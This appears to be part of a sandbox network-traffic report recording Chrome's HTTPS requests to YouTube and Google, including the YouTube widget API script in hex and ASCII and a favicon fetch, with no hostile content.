                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:41:43 GMT
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:41:43 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube_main"
                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script'
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Origin-Trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
                                                                                                                                                                                                                                                                                          Content-Security-Policy-Report-Only: base-uri 'self';default-src 'self' https: blob:;font-src https: data:;img-src https: data: android-webview-video-poster:;media-src blob: https:;object-src 'none';report-uri /cspreport/common;script-src 'report-sample' 'nonce-pwGAeQXt1NO9DUfIQVOjGg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';style-src https: 'unsafe-inline'
                                                                                                                                                                                                                                                                                          Report-To: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657?hl=en for more info."
                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Set-Cookie: YSC=xT5Lh7KSV4U; Domain=.youtube.com; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                                                                                                                          Set-Cookie: VISITOR_INFO1_LIVE=dtB2Vu2JY3k; Domain=.youtube.com; Expires=Wed, 26-Mar-2025 14:41:43 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                                                                                                                          Set-Cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgDQ%3D%3D; Domain=.youtube.com; Expires=Wed, 26-Mar-2025 14:41:43 GMT; Path=/; Secure; HttpOnly; SameSite=none; Partitioned
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version,Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1000INData Raw: 33 65 31 0d 0a 76 61 72 20 73 63 72 69 70 74 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 5c 2f 73 5c 2f 70 6c 61 79 65 72 5c 2f 62 30 35 35 37 63 65 33 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 76 66 6c 73 65 74 5c 2f 77 77 77 2d 77 69 64 67 65 74 61 70 69 2e 6a 73 27 3b 74 72 79 7b 76 61 72 20 74 74 50 6f 6c 69 63 79 3d 77 69 6e 64 6f 77 2e 74 72 75 73 74 65 64 54 79 70 65 73 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 79 6f 75 74 75 62 65 2d 77 69 64 67 65 74 2d 61 70 69 22 2c 7b 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 78 29 7b 72 65 74 75 72 6e 20 78 7d 7d 29 3b 73 63 72 69 70 74 55 72 6c 3d 74 74 50 6f 6c 69 63 79 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52
                                                                                                                                                                                                                                                                                          Data Ascii: 3e1var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/b0557ce3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptUR
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          121192.168.2.749912142.250.186.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC479OUTGET /s/player/b0557ce3/www-widgetapi.vflset/www-widgetapi.js HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.youtube.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC686INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="youtube"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 31666
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 11:55:31 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 27 Sep 2025 11:55:31 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 25 Sep 2024 04:14:17 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                                          Age: 9972
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC704INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 76 61 72 20 71 3b 66 75 6e 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 21 30 7d 7d 7d 0a 76 61 72 20 72 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29
                                                                                                                                                                                                                                                                                          Data Ascii: (function(){'use strict';var q;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var r=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 3b 62 3d 62 28 64 29 3b 62 21 3d 64 26 26 62 21 3d 6e 75 6c 6c 26 26 72 28 63 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 7d 7d 0a 75 28 22 53 79 6d 62 6f 6c 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 79 6d 62 6f 6c 20 69 73 20 6e 6f 74 20 61 20 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 63 28 64 2b 28 6b 7c 7c 22 22 29 2b 22 5f 22 2b 67 2b 2b 2c 6b 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 28 6b 2c 65 29 7b 74 68 69 73 2e 67 3d 6b 3b 72 28 74 68 69 73 2c 22 64 65 73 63 72 69 70 74
                                                                                                                                                                                                                                                                                          Data Ascii: ;b=b(d);b!=d&&b!=null&&r(c,a,{configurable:!0,writable:!0,value:b})}}u("Symbol",function(a){function b(k){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(k||"")+"_"+g++,k)}function c(k,e){this.g=k;r(this,"descript
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 77 3d 78 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 21 3d 3d 62 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 61 2b 22 20 69 73 20 6e 6f 74 20 65 78 74 65 6e 73 69 62 6c 65 22 29 3b 72 65 74 75 72 6e 20 61 7d 3a 6e 75 6c 6c 7d 76 61 72 20 6a 61 3d 77 3b 0a 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 74 68 69 73 2e 6a 3d 21 31 3b 74 68 69 73 2e 68 3d 6e 75 6c 6c 3b 74 68 69 73 2e 6d 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 67 3d 31 3b 74 68 69 73 2e 41 3d 74 68 69 73 2e 6c 3d 30 3b 74 68 69 73 2e 69 3d 6e 75 6c 6c 7d 0a 66 75 6e 63 74 69 6f 6e 20 7a 28 61 29 7b 69 66 28 61 2e 6a 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61
                                                                                                                                                                                                                                                                                          Data Ascii: w=x?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}var ja=w;function y(){this.j=!1;this.h=null;this.m=void 0;this.g=1;this.A=this.l=0;this.i=null}function z(a){if(a.j)throw new TypeError("Genera
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 7b 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 7d 3b 0a 74 68 69 73 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 0a 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 64 29 7b 72 65 74 75 72 6e 20 61 2e 6e 65 78 74 28 64 29 7d 0a 66 75 6e 63 74 69 6f 6e 20 63 28 64 29 7b 72 65 74 75 72 6e 20 61 2e 74 68 72 6f 77 28 64 29 7d 0a 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 64 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 65 2e 64 6f 6e 65 3f 64 28 65 2e 76 61 6c 75 65 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 65 2e 76 61 6c 75 65 29 2e 74 68 65 6e 28 62 2c 63 29 2e 74 68 65 6e 28 6b 2c 67 29 7d
                                                                                                                                                                                                                                                                                          Data Ascii: {return la(a,b)};this[Symbol.iterator]=function(){return this}}function oa(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,g){function k(e){e.done?d(e.value):Promise.resolve(e.value).then(b,c).then(k,g)}
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 30 3b 74 72 79 7b 66 3d 65 2e 74 68 65 6e 7d 63 61 74 63 68 28 68 29 7b 74 68 69 73 2e 6c 28 68 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 4e 28 66 2c 65 29 3a 74 68 69 73 2e 6d 28 65 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 41 28 32 2c 65 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 41 28 31 2c 65 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 41 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 69 66 28 74 68 69 73 2e 68 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 65 2b 22 2c 20 22 2b 66 2b 22 29 3a 20 50 72 6f 6d 69 73
                                                                                                                                                                                                                                                                                          Data Ascii: 0;try{f=e.then}catch(h){this.l(h);return}typeof f=="function"?this.N(f,e):this.m(e)};b.prototype.l=function(e){this.A(2,e)};b.prototype.m=function(e){this.A(1,e)};b.prototype.A=function(e,f){if(this.h!=0)throw Error("Cannot settle("+e+", "+f+"): Promis
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 2c 65 29 7d 3b 0a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 42 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 73 77 69 74 63 68 28 6c 2e 68 29 7b 63 61 73 65 20 31 3a 65 28 6c 2e 69 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 66 28 6c 2e 69 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 68 29 3b 7d 7d 0a 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 67 3d 3d 6e 75 6c 6c 3f 6b 2e 68 28 68 29 3a 74 68 69 73 2e 67 2e 70 75 73 68 28 68 29 3b 74 68 69 73 2e 73 3d 21 30 7d 3b 0a 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ,e)};b.prototype.B=function(e,f){function h(){switch(l.h){case 1:e(l.i);break;case 2:f(l.i);break;default:throw Error("Unexpected state: "+l.h);}}var l=this;this.g==null?k.h(h):this.g.push(h);this.s=!0};b.resolve=d;b.reject=function(e){return new b(fun
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 69 62 6c 65 28 6d 29 26 26 67 28 6d 29 3b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 29 7d 0a 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6d 3d 6e 65 77 20 61 28 5b 5b 68 2c 32 5d 2c 5b 6c 2c 33 5d 5d 29 3b 69 66 28 6d 2e 67 65 74 28 68 29 21 3d 32 7c 7c 6d 2e 67 65 74 28 6c 29 21 3d 33 29 72 65 74 75 72 6e 21 31 3b 6d 2e 64 65 6c 65 74 65 28 68 29 3b 6d 2e 73 65 74 28 6c 2c 34 29 3b 72 65 74 75 72 6e 21 6d 2e 68 61 73 28 68 29 26 26 6d 2e 67 65 74 28 6c 29 3d 3d 34 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72
                                                                                                                                                                                                                                                                                          Data Ascii: ible(m)&&g(m);return l(m)})}if(function(){if(!a||!Object.seal)return!1;try{var h=Object.seal({}),l=Object.seal({}),m=new a([[h,2],[l,3]]);if(m.get(h)!=2||m.get(l)!=3)return!1;m.delete(h);m.set(l,4);return!m.has(h)&&m.get(l)==4}catch(n){return!1}}())retur
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 65 2c 74 68 69 73 2e 73 65 74 28 68 5b 30 5d 2c 68 5b 31 5d 29 7d 7d 0a 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 66 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 68 3d 6e 65 77 20 61 28 76 28 5b 5b 66 2c 22 73 22 5d 5d 29 29 3b 69 66 28 68 2e 67 65 74 28 66 29 21 3d 22 73 22 7c 7c 68 2e 73 69 7a 65 21 3d 31 7c 7c 68 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 68 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 68 7c 7c 68 2e 73 69 7a 65 21 3d 32 29 72
                                                                                                                                                                                                                                                                                          Data Ascii: e,this.set(h[0],h[1])}}if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var f=Object.seal({x:4}),h=new a(v([[f,"s"]]));if(h.get(f)!="s"||h.size!=1||h.get({x:4})||h.set({x:4},"t")!=h||h.size!=2)r
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 68 29 7b 66 6f 72 28 76 61 72 20 6c 3d 74 68 69 73 2e 65 6e 74 72 69 65 73 28 29 2c 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 66 2e 63 61 6c 6c 28 68 2c 6d 5b 31 5d 2c 6d 5b 30 5d 2c 74 68 69 73 29 7d 3b 0a 67 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 67 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 65 3d 30 3b 72 65 74 75 72 6e 20 67 7d 29 3b 0a 75 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 63 29 7b 74 68 69 73 2e 67 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d 76 28 63 29 3b 66 6f 72 28 76 61 72 20 64 3b
                                                                                                                                                                                                                                                                                          Data Ascii: ototype.forEach=function(f,h){for(var l=this.entries(),m;!(m=l.next()).done;)m=m.value,f.call(h,m[1],m[0],this)};g.prototype[Symbol.iterator]=g.prototype.entries;var e=0;return g});u("Set",function(a){function b(c){this.g=new Map;if(c){c=v(c);for(var d;
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:43 UTC1390INData Raw: 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 67 3d 64 2e 6c 65 6e 67 74 68 2c 6b 3d 30 3b 6b 3c 67 3b 6b 2b 2b 29 7b 76 61 72 20 65 3d 64 5b 6b 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 65 2c 6b 2c 64 29 29 7b 62 3d 65 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 0a 75 28 22 41 72 72 61 79 2e 66 72 6f 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 2c 64 29 7b 63 3d 63 21 3d 6e 75 6c 6c 3f 63 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66
                                                                                                                                                                                                                                                                                          Data Ascii: urn a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var g=d.length,k=0;k<g;k++){var e=d[k];if(b.call(c,e,k,d)){b=e;break a}}b=void 0}return b}});u("Array.from",function(a){return a?a:function(b,c,d){c=c!=null?c:function(f){return f


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          122192.168.2.749922142.250.186.1324435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC916OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://recovertogether.withgoogle.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: NID=517=XCncyRcSTrNdBlNrxMb65pRXt1ueWasZCJ7Flq465cSo-u-KsTpxBugTZu7FnSu_rJ_yDCfIY3wJh9V_NHX_IqRCZs49J-ZvunhKTtiYfJz4ll5c9A_kGis_11iMCzLSrXtjsGQHAG4VNuprLECiQglheVy33XQFiexvtOtKeAxIhkkwHq17XLg9BdgeTgl1yPbJqq86K5NuS6G1r_0Q7w
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC705INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                                                                                                                                                          Content-Length: 5430
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Server: sffe
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 12:18:45 GMT
                                                                                                                                                                                                                                                                                          Expires: Sat, 05 Oct 2024 12:18:45 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=691200
                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Age: 8580
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:45 UTC685INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                                                                                                                                                          Data Ascii: h& ( 0.v]X:X:rY
